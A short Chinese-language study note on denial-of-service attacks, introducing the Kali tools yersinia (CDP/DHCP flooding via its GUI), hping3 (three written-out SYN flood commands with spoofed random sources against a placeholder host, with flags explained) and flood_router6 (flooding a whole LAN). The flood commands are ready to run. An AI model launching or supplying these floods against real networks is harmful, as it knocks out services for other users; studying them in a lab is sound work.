拒绝服务攻击(dos攻击):
拒绝服务攻击即攻击者想办法让目标机器停止提供服务
消耗带宽,cpu,内存资源(各种洪水攻击)
延长响应时间
利用服务漏洞,攻陷服务
ip欺骗
分布式拒绝服务攻击体系结构:
yersinia工具(可以发起dhcp攻击)(kali里面有):
yersinia是一款底层协议攻击入侵检测工具。他能实施针对多种协议的多种攻击。例如夺取夺取生成树的根角色(生成树协议)生成虚拟CDP(cisco发现协议)邻居,在一个hsrp(热等待路由协议)环境中虚拟成一个活动的路由器,制造假DHCP反馈,以及其他底层攻击。
yersinia -G 启动图形终端
选择 flooding CDP table 然后点击ok!
可以拿自己的电脑做实验,点击启动后关闭自己的网络,然后再选择连接就会发现自己的网络dhcp连接不上。到此dhcp拒绝服务攻击就实验成功了。
hping3工具(可以发起洪水攻击)(kali里面有):
hping是用于生成和解析tcp|ip协议数据包的开源工具,hping是安全审计,防火墙测试等工作的标配工具。hping优势在于能够定制数据包的各个部分,因此用户可以灵活的对目标机进行细致的探测。
hping3 -S --flood -V xxx.xxx.com
hping3 -S -P-U --flood -V --rand-source xxx.xxx.com
hping3 -S -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source xxx.xxx.com
(-S 表示指定模式为syn请求,--flood 表示洪水攻击,-V表示显示数据包的详细信息,-P-U表示对tcp请求的设置,--rand-source
表示动态的指定ip和虚拟ip,-c 表示发送数据包的个数,-d表示发送数据包的大小,-w 表示对tcp请求的定制,端口号)
以上三条命令都可以发起洪水攻击
这里还提到一个 flood_router6 工具 命令如下:
flood_router6 -H eth0 原理:通过路由器的广播方式进行洪水攻击(整个局域网)